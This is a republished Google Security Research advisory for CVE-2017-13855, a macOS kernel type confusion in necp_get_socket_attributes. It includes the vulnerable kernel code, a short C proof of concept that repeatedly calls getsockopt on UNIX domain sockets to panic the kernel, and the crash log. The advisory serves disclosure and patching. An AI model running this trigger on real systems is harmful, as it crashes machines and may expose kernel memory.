首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
macOS necp_get_socket_attributes so_pcb Type Confusion
来源:Google Security Research 作者:jannh 发布时间:2017-12-12  
MacOS so_pcb type confusion in necp_get_socket_attributes 

CVE-2017-13855


When setsockopt() is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.
necp_get_socket_attributes() unconditionally calls sotoinpcb(so):

    errno_t
    necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)
    {
            int error = 0;
            u_int8_t *buffer = NULL;
            u_int8_t *cursor = NULL;
            size_t valsize = 0;
            struct inpcb *inp = sotoinpcb(so);

            if (inp->inp_necp_attributes.inp_domain != NULL) {
                    valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);
            }
    [...]
    }

sotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):

    #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)

If necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).


To trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).

==============
#include <sys/types.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <err.h>
#include <unistd.h>

#define SO_NECP_ATTRIBUTES 0x1109

int main(void) {
  while (1) {
    int s = socket(AF_UNIX, SOCK_STREAM, 0);
    if (s == -1)
      err(1, "socket");
    getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);
    close(s);
  }
}
==============

On macOS 10.13 (17A405), this causes the following crash:

==============
*** Panic Report ***
panic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:
CR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0
RAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc
RSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8
<a href="https://crrev.com/8" title="" class="" rel="nofollow">R8</a>:  0x0000000000000001, <a href="https://crrev.com/9" title="" class="" rel="nofollow">R9</a>:  0xffffffff00000000, <a href="https://crrev.com/10" title="" class="" rel="nofollow">R10</a>: 0x0000000000000000, <a href="https://crrev.com/11" title="" class="" rel="nofollow">R11</a>: 0x0000000000000246
<a href="https://crrev.com/12" title="" class="" rel="nofollow">R12</a>: 0xffffff80357cf7d0, <a href="https://crrev.com/13" title="" class="" rel="nofollow">R13</a>: 0xffffff8032d69a08, <a href="https://crrev.com/14" title="" class="" rel="nofollow">R14</a>: 0xffffff8018de3ef0, <a href="https://crrev.com/15" title="" class="" rel="nofollow">R15</a>: 0xffffff8032ac66a8
RFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1
==============

This bug should be usable for disclosing kernel memory.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.



Found by: jannh


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·macOS XNU Kernel - Memory Disc
·macOS getrusage Stack Leak
·MikroTik 6.40.5 ICMP - Denial
·macOS/iOS - Multiple Kernel Us
·Apple macOS 10.13.1 (High Sier
·macOS - Kernel Code Execution
·Apple macOS 10.13.1 (High Sier
·macOS/iOS - Kernel Double Free
·LabF nfsAxe FTP Client 3.7 - B
·glibc ld.so - Memory Leak / Bu
·Linux Kernel - DCCP Socket Use
·pfSense 2.4.1 CSRF Error Page
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved